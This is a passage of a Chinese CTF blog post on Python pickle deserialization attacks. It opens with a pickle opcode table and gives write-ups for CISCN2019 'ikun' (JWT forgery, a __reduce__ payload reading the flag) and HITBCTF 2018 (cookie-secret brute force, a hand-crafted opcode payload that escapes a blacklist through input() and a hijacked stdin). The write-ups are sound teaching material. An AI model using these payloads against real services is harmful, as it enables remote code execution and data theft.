<p><a target="_blank" rel="noopener" href="https://github.com/sensepost/anapickle/blob/master/anapickle.py">https://github.com/sensepost/anapickle/blob/master/anapickle.py</a></p>
<figure class="highlight py"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs py">MARK            = <span class="hljs-string">&#x27;(&#x27;</span>   <span class="hljs-comment"># push special markobject on stack</span><br>STOP            = <span class="hljs-string">&#x27;.&#x27;</span>   <span class="hljs-comment"># every pickle ends with STOP</span><br>POP             = <span class="hljs-string">&#x27;0&#x27;</span>   <span class="hljs-comment"># discard topmost stack item</span><br>POP_MARK        = <span class="hljs-string">&#x27;1&#x27;</span>   <span class="hljs-comment"># discard stack top through topmost markobject</span><br>DUP             = <span class="hljs-string">&#x27;2&#x27;</span>   <span class="hljs-comment"># duplicate top stack item</span><br>FLOAT           = <span class="hljs-string">&#x27;F&#x27;</span>   <span class="hljs-comment"># push float object; decimal string argument</span><br>INT             = <span class="hljs-string">&#x27;I&#x27;</span>   <span class="hljs-comment"># push integer or bool; decimal string argument</span><br>BININT          = <span class="hljs-string">&#x27;J&#x27;</span>   <span class="hljs-comment"># push four-byte signed int</span><br>BININT1         = <span class="hljs-string">&#x27;K&#x27;</span>   <span class="hljs-comment"># push 1-byte unsigned int</span><br>LONG            = <span class="hljs-string">&#x27;L&#x27;</span>   <span class="hljs-comment"># push long; decimal string argument</span><br>BININT2         = <span class="hljs-string">&#x27;M&#x27;</span>   <span class="hljs-comment"># push 2-byte unsigned int</span><br>NONE            = <span class="hljs-string">&#x27;N&#x27;</span>   <span class="hljs-comment"># push None</span><br>PERSID          = <span class="hljs-string">&#x27;P&#x27;</span>   <span class="hljs-comment"># push persistent object; id is taken from string arg</span><br>BINPERSID       = <span class="hljs-string">&#x27;Q&#x27;</span>   <span class="hljs-comment">#  &quot;       &quot;         &quot;  ;  &quot;  &quot;   &quot;     &quot;  stack</span><br>REDUCE          = <span class="hljs-string">&#x27;R&#x27;</span>   <span class="hljs-comment"># apply callable to argtuple, both on stack</span><br>STRING          = <span class="hljs-string">&#x27;S&#x27;</span>   <span class="hljs-comment"># push string; NL-terminated string argument</span><br>BINSTRING       = <span class="hljs-string">&#x27;T&#x27;</span>   <span class="hljs-comment"># push string; counted binary string argument</span><br>SHORT_BINSTRING = <span class="hljs-string">&#x27;U&#x27;</span>   <span class="hljs-comment">#  &quot;     &quot;   ;    &quot;      &quot;       &quot;      &quot; &lt; 256 bytes</span><br>UNICODE         = <span class="hljs-string">&#x27;V&#x27;</span>   <span class="hljs-comment"># push Unicode string; raw-unicode-escaped&#x27;d argument</span><br>BINUNICODE      = <span class="hljs-string">&#x27;X&#x27;</span>   <span class="hljs-comment">#   &quot;     &quot;       &quot;  ; counted UTF-8 string argument</span><br>APPEND          = <span class="hljs-string">&#x27;a&#x27;</span>   <span class="hljs-comment"># append stack top to list below it</span><br>BUILD           = <span class="hljs-string">&#x27;b&#x27;</span>   <span class="hljs-comment"># call __setstate__ or __dict__.update()</span><br>GLOBAL          = <span class="hljs-string">&#x27;c&#x27;</span>   <span class="hljs-comment"># push self.find_class(modname, name); 2 string args</span><br>DICT            = <span class="hljs-string">&#x27;d&#x27;</span>   <span class="hljs-comment"># build a dict from stack items</span><br>EMPTY_DICT      = <span class="hljs-string">&#x27;&#125;&#x27;</span>   <span class="hljs-comment"># push empty dict</span><br>APPENDS         = <span class="hljs-string">&#x27;e&#x27;</span>   <span class="hljs-comment"># extend list on stack by topmost stack slice</span><br>GET             = <span class="hljs-string">&#x27;g&#x27;</span>   <span class="hljs-comment"># push item from memo on stack; index is string arg</span><br>BINGET          = <span class="hljs-string">&#x27;h&#x27;</span>   <span class="hljs-comment">#   &quot;    &quot;    &quot;    &quot;   &quot;   &quot;  ;   &quot;    &quot; 1-byte arg</span><br>INST            = <span class="hljs-string">&#x27;i&#x27;</span>   <span class="hljs-comment"># build &amp; push class instance</span><br>LONG_BINGET     = <span class="hljs-string">&#x27;j&#x27;</span>   <span class="hljs-comment"># push item from memo on stack; index is 4-byte arg</span><br>LIST            = <span class="hljs-string">&#x27;l&#x27;</span>   <span class="hljs-comment"># build list from topmost stack items</span><br>EMPTY_LIST      = <span class="hljs-string">&#x27;]&#x27;</span>   <span class="hljs-comment"># push empty list</span><br>OBJ             = <span class="hljs-string">&#x27;o&#x27;</span>   <span class="hljs-comment"># build &amp; push class instance</span><br>PUT             = <span class="hljs-string">&#x27;p&#x27;</span>   <span class="hljs-comment"># store stack top in memo; index is string arg</span><br>BINPUT          = <span class="hljs-string">&#x27;q&#x27;</span>   <span class="hljs-comment">#   &quot;     &quot;    &quot;   &quot;   &quot; ;   &quot;    &quot; 1-byte arg</span><br>LONG_BINPUT     = <span class="hljs-string">&#x27;r&#x27;</span>   <span class="hljs-comment">#   &quot;     &quot;    &quot;   &quot;   &quot; ;   &quot;    &quot; 4-byte arg</span><br>SETITEM         = <span class="hljs-string">&#x27;s&#x27;</span>   <span class="hljs-comment"># add key+value pair to dict</span><br>TUPLE           = <span class="hljs-string">&#x27;t&#x27;</span>   <span class="hljs-comment"># build tuple from topmost stack items</span><br>EMPTY_TUPLE     = <span class="hljs-string">&#x27;)&#x27;</span>   <span class="hljs-comment"># push empty tuple</span><br>SETITEMS        = <span class="hljs-string">&#x27;u&#x27;</span>   <span class="hljs-comment"># modify dict by adding topmost key+value pairs</span><br>BINFLOAT        = <span class="hljs-string">&#x27;G&#x27;</span>   <span class="hljs-comment"># push float; arg is 8-byte float encoding</span><br><br>TRUE            = <span class="hljs-string">&#x27;I01\n&#x27;</span>  <span class="hljs-comment"># not an opcode; see INT docs in pickletools.py</span><br>FALSE           = <span class="hljs-string">&#x27;I00\n&#x27;</span>  <span class="hljs-comment"># not an opcode; see INT docs in pickletools.py</span><br><br><span class="hljs-comment"># Protocol 2</span><br><br>PROTO           = <span class="hljs-string">&#x27;\x80&#x27;</span>  <span class="hljs-comment"># identify pickle protocol</span><br>NEWOBJ          = <span class="hljs-string">&#x27;\x81&#x27;</span>  <span class="hljs-comment"># build object by applying cls.__new__ to argtuple</span><br>EXT1            = <span class="hljs-string">&#x27;\x82&#x27;</span>  <span class="hljs-comment"># push object from extension registry; 1-byte index</span><br>EXT2            = <span class="hljs-string">&#x27;\x83&#x27;</span>  <span class="hljs-comment"># ditto, but 2-byte index</span><br>EXT4            = <span class="hljs-string">&#x27;\x84&#x27;</span>  <span class="hljs-comment"># ditto, but 4-byte index</span><br>TUPLE1          = <span class="hljs-string">&#x27;\x85&#x27;</span>  <span class="hljs-comment"># build 1-tuple from stack top</span><br>TUPLE2          = <span class="hljs-string">&#x27;\x86&#x27;</span>  <span class="hljs-comment"># build 2-tuple from two topmost stack items</span><br>TUPLE3          = <span class="hljs-string">&#x27;\x87&#x27;</span>  <span class="hljs-comment"># build 3-tuple from three topmost stack items</span><br>NEWTRUE         = <span class="hljs-string">&#x27;\x88&#x27;</span>  <span class="hljs-comment"># push True</span><br>NEWFALSE        = <span class="hljs-string">&#x27;\x89&#x27;</span>  <span class="hljs-comment"># push False</span><br>LONG1           = <span class="hljs-string">&#x27;\x8a&#x27;</span>  <span class="hljs-comment"># push long from &lt; 256 bytes</span><br>LONG4           = <span class="hljs-string">&#x27;\x8b&#x27;</span>  <span class="hljs-comment"># push really big long</span><br></code></pre></div></td></tr></table></figure>

<h1 id="CISCN2019-华北赛区-Day1-Web2-ikun"><a href="#CISCN2019-华北赛区-Day1-Web2-ikun" class="headerlink" title="[CISCN2019 华北赛区 Day1 Web2]ikun"></a>[CISCN2019 华北赛区 Day1 Web2]ikun</h1><p>考点就是jwt伪造和pickle反序列化</p>
<p>题目有提示是要找到<code>lv6</code>，写个脚本爆破就行，在<code>page=181</code>发现<code>lv6</code>，但购买数额很大，抓包发现可以改折扣然后会进行一个跳转<code>/b1g_m4mber</code>，</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">import</span>  requests<br>url = <span class="hljs-string">&#x27;http://6429f3b4-abd3-4051-88e2-a078083710f8.node4.buuoj.cn:81/shop?&#x27;</span><br>s = requests.session()<br>cookie = &#123;<span class="hljs-string">&#x27;UM_distinctid&#x27;</span>:<span class="hljs-string">&#x27;178da808111afb-0cc46980b0aa53-406d2516-1fa400-178da808112649&#x27;</span>&#125;<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1000</span>):<br>    p = url + <span class="hljs-string">&#x27;page=&#x27;</span> + <span class="hljs-built_in">str</span>(i)<br>    content = s.get(url=p).text<br>    <span class="hljs-built_in">print</span>(p)<br>    <span class="hljs-comment"># print(content)</span><br>    <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;lv6.png&#x27;</span> <span class="hljs-keyword">in</span> content:<br>        <span class="hljs-built_in">print</span>(i)<br></code></pre></div></td></tr></table></figure>



<p>访问需要admin才行，抓包可以看到有cookie中有<code>JWT</code>值，则可以猜想到是伪造<code>jwt</code>，密码爆破出来是<code>1Kun</code></p>
<p><img src="https://img-blog.csdnimg.cn/eebe3cb51aca470ab7cdc674b2ce86b0.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>以admin登陆后就可以发现源码了。</p>
<p><img src="https://img-blog.csdnimg.cn/de33790712914320baff419ad4113daf.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>看到源码，是<code>tornado</code>框架，全局搜了一下<code>pickle</code>看到了入口</p>
<p><img src="https://img-blog.csdnimg.cn/a10e8eb54e644f10a0905768521b37e6.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>这里直接<code>pickle.loads</code>反序列化数据了，没有任何为难。注意这个地方用的是<code>python2</code>写的，有些<code>python3</code>的模块无法导致命令执行。</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">import</span> os<br><span class="hljs-keyword">import</span> pickle<br><span class="hljs-keyword">from</span> urllib.parse <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">import</span> subprocess<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">exp</span>:</span><br>    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__reduce__</span>(<span class="hljs-params">self</span>):</span><br>        <span class="hljs-keyword">return</span> (<span class="hljs-built_in">eval</span>, (<span class="hljs-string">&quot;open(&#x27;/flag.txt&#x27;,&#x27;r&#x27;).read()&quot;</span>,))<br>        <span class="hljs-comment"># return (eval,(&quot;\&quot;os.popen(&#x27;ls /&#x27;).read()\&quot;&quot;,))</span><br>        <span class="hljs-comment"># return (commands.getoutput, (&#x27;ls /&#x27;,))</span><br>test = exp()<br>test = pickle.dumps(test,protocol=<span class="hljs-number">0</span>)<br><span class="hljs-built_in">print</span>(test)<br>p = quote(test)<br><span class="hljs-built_in">print</span>(p)<br></code></pre></div></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/2894210024f64f87b1d85b541a085df4.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>这个地方得加上<code>xsrf</code>原因在于在实例化的时候设置了<code>xsrf_cookies=True</code>，并且在模板渲染时还有<code>&#123;% raw xsrf_form_html() %&#125;</code></p>
<p><img src="https://img-blog.csdnimg.cn/b1b39fad894e44e9a2d13046cb02b2a3.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>所以在用<code>post</code>请求时，会在页面中带有<code>xsrf</code>标签，如果没有传入<code>xsrf</code>值则会产生404，使用<code>get</code>，不需要<code>xsrf</code>保护。</p>
<p><img src="https://img-blog.csdnimg.cn/947635780dcd4a4baee831807f96db2a.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>具体可以参考<a target="_blank" rel="noopener" href="https://stackoverflow.com/questions/12890105/tornado-xsrf-argument-missing-from-post/12917054">https://stackoverflow.com/questions/12890105/tornado-xsrf-argument-missing-from-post/12917054</a></p>
<p>​                       <a target="_blank" rel="noopener" href="https://www.tornadoweb.org/en/latest/guide/security.html#cross-site-request-forgery-protection">https://www.tornadoweb.org/en/latest/guide/security.html#cross-site-request-forgery-protection</a></p>
<h1 id="HITBCTF-2018-Python’s-revenge"><a href="#HITBCTF-2018-Python’s-revenge" class="headerlink" title="HITBCTF 2018 Python’s revenge"></a>HITBCTF 2018 Python’s revenge</h1><p>贴一下源码<a target="_blank" rel="noopener" href="https://github.com/p4-team/ctf/tree/master/2018-04-11-hitb-quals/web_python">https://github.com/p4-team/ctf/tree/master/2018-04-11-hitb-quals/web_python</a></p>
<p>关键代码，重写了<code>loads</code>方法，用了<code>black_type_list </code>白名单过滤，原理就是将<code>unpkler.dispatch[pickle.REDUCE]</code>中使用<code>R</code>操作符弹栈时调用的函数改成了<code>wrapper</code>先进行了一遍检查，绕过了过滤再执行<code>func(*args, **kwargs)</code>返回结果。</p>
<p><img src="https://img-blog.csdnimg.cn/f713855d70fd450db7ea31489c00738c.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>入口在<code>reminder</code>函数，在<code>POST</code>请求时，序列化后用base64编码，然后调用了<code>make_cookie</code>，后面将<code>cookie</code>赋值了。</p>
<p>​    <img src="https://img-blog.csdnimg.cn/6d67538804e840a88e76cfb3fed295e8.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>这里就只是进行了一下sha256加密，问题时这里的<code>secret</code>不知道，但是源码最开始可以发现<code>cookie_secret</code>在<code>.secret</code>文件中，而且只写入了一次，所以可以用一个加密后的cookie将 <code>secret</code>爆破出来。    </p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">make_cookie</span>(<span class="hljs-params">location, secret</span>):</span><span class="hljs-keyword">return</span> <span class="hljs-string">&quot;%s!%s&quot;</span> % (calc_digest(location, secret), location)<br><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">calc_digest</span>(<span class="hljs-params">location, secret</span>):</span><span class="hljs-keyword">return</span> sha256(<span class="hljs-string">&quot;%s%s&quot;</span> % (location, secret)).hexdigest()<br></code></pre></div></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> os.path.exists(<span class="hljs-string">&#x27;.secret&#x27;</span>):<br>    <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;.secret&quot;</span>, <span class="hljs-string">&quot;w&quot;</span>) <span class="hljs-keyword">as</span> f:<br>        secret = <span class="hljs-string">&#x27;&#x27;</span>.join(random.choice(string.ascii_letters + string.digits)<br>                         <span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">4</span>))<br>        f.write(secret)<br><span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;.secret&quot;</span>, <span class="hljs-string">&quot;r&quot;</span>) <span class="hljs-keyword">as</span> f:<br>    cookie_secret = f.read().strip()<br></code></pre></div></td></tr></table></figure>



<p>用爆破出来的<code>secret</code>结合构造的<code>opcode</code>伪造一个cookie绕过<code>getlocation()</code>的检查。</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">getlocation</span>():</span><br>    cookie = request.cookies.get(<span class="hljs-string">&#x27;location&#x27;</span>)<br>    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> cookie:<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;&#x27;</span><br>    (digest, location) = cookie.split(<span class="hljs-string">&quot;!&quot;</span>)<br>    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> safe_str_cmp(calc_digest(location, cookie_secret), digest):<br>        flash(<span class="hljs-string">&quot;Hey! This is not a valid cookie! Leave me alone.&quot;</span>)<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span><br>    location = loads(b64d(location))<br>    <span class="hljs-keyword">return</span> location<br><br><br><br></code></pre></div></td></tr></table></figure>



<p>爆破脚本</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">from</span> hashlib <span class="hljs-keyword">import</span> sha256<br><span class="hljs-keyword">import</span> string<br>data = <span class="hljs-string">&#x27;d7e3bd07f7ae389f07abe89d199ebae1e1e67b4479a98870ee5a3c4fe0f56237!VjErMQpwMAou&#x27;</span> <span class="hljs-comment">#拿了个样本</span><br>(calc_digest_result,location) = data.split(<span class="hljs-string">&#x27;!&#x27;</span>)<br>stringlist = string.ascii_letters<br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">break_secret</span>():</span><br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> stringlist:<br>        <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> stringlist:<br>            <span class="hljs-keyword">for</span> k <span class="hljs-keyword">in</span> stringlist:<br>                <span class="hljs-keyword">for</span> p <span class="hljs-keyword">in</span> stringlist:<br>                    data = location + i +j +k +p<br>                    <span class="hljs-keyword">if</span> sha256(data).hexdigest() == calc_digest_result:<br>                        <span class="hljs-built_in">print</span> i +j +k +p<br>                        exit(<span class="hljs-number">1</span>)<br>break_secret()<br><br><span class="hljs-comment">#输出</span><br><span class="hljs-comment">#VjErMQpwMAou d7e3bd07f7ae389f07abe89d199ebae1e1e67b4479a98870ee5a3c4fe0f56237</span><br><span class="hljs-comment">#hitb</span><br></code></pre></div></td></tr></table></figure>



<blockquote>
<p>接下来，解决python的沙盒逃逸问题，首先我们要找出一个可以执行命令的函数，这里过滤很很多，但是仔细想想，可以观察到注意到这段代码的一个重要事情 - 它是Python 2，并且在黑名单中没有input（）函数。关于这个函数，python 2和3之间有很大的区别。在python 3中，它的行为与python 2中的raw_input（）相同 ,它只是从stdin读取输入。但在python 2中它所做的实际上是eval（raw_input（）），所以通过使用input（）我们可以做eval（）。input函数在__builtin__ moudle中，于是有：`</p>
</blockquote>
<p>这个地方注意input需要从stdin读取数据，则最终构造的payload实际为 </p>
<p>关于stdin可看<a target="_blank" rel="noopener" href="https://www.codenong.com/1450393/">https://www.codenong.com/1450393/</a></p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python">__builtin__.<span class="hljs-built_in">setattr</span>(__builtin__.<span class="hljs-built_in">__import__</span>(<span class="hljs-string">&#x27;sys&#x27;</span>),sysin,cStringIO.StringIO(<span class="hljs-string">&#x27;需要执行的命令&#x27;</span>))<br>__builtin__.<span class="hljs-built_in">input</span>(<span class="hljs-string">&#x27;python&gt;&#x27;</span>)<br></code></pre></div></td></tr></table></figure>

<p>构造opcode为</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python">command_to_eval = raw_input(<span class="hljs-string">&quot;python&gt; &quot;</span>)<br>data = <span class="hljs-string">b&quot;&quot;&quot;c__builtin__</span><br><span class="hljs-string">setattr</span><br><span class="hljs-string">(c__builtin__</span><br><span class="hljs-string">__import__</span><br><span class="hljs-string">(S&#x27;sys&#x27;</span><br><span class="hljs-string">tRS&#x27;stdin&#x27;</span><br><span class="hljs-string">cStringIO</span><br><span class="hljs-string">StringIO</span><br><span class="hljs-string">(S&#x27;&quot;&quot;&quot;</span> +   command_to_eval  +  <span class="hljs-string">&quot;&quot;&quot;&#x27;</span><br><span class="hljs-string">tRtRc__builtin__</span><br><span class="hljs-string">input</span><br><span class="hljs-string">(S&#x27;python&gt;&#x27;</span><br><span class="hljs-string">tR.&quot;&quot;&quot;</span><br></code></pre></div></td></tr></table></figure>

<p>测试了一下</p>
<p><img src="https://img-blog.csdnimg.cn/06d2c47ff5be4d378954d78df472a483.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>最后可以输入__import__(‘os’).listdir(“/“)、<strong>import</strong>(‘os’).system(“ls”) 、<strong>import</strong>(‘subprocess’).check_output(“ls”)等进行测试，可以发现根目录下存在flag_is_here,执行open(“/flag_is_here”,”r”).read()，得到：HITB{Py5h0n1st8eBe3tNOW}。</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/web/">web</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/web/">web</a>
                    
                      <a class="hover-with-bg" href="/tags/ctf/">ctf</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/08/18/2021-8-16-%E5%81%9A%E5%87%A0%E9%81%93%E9%A2%98/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">做几道网鼎杯</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/08/09/2021-8-6-%E5%B7%85%E5%B3%B0%E6%9E%81%E5%AE%A2web%E5%A4%8D%E7%8E%B0/">
                        <span class="hidden-mobile">巅峰极客总结</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->

<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>
<!-- 代码语言 -->
<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>
<!-- 代码块复制 -->
<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>
<script type="text/javascript" src="/libs/codeBlock/clipboard.min.js"></script>
<!-- 代码块收缩 -->
<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script> 
<!-- 代码块折行 -->
<style type="text/css">code[class*="language-"], pre[class*="language-"] { white-space: pre !important; }</style>

    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  
  <!-- 备案信息 -->
  <div class="beian">
    <span>
      <a href="http://beian.miit.gov.cn/" target="_blank" rel="nofollow noopener">
        京ICP备2022002829号
      </a>
    </span>
    
  </div>


  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
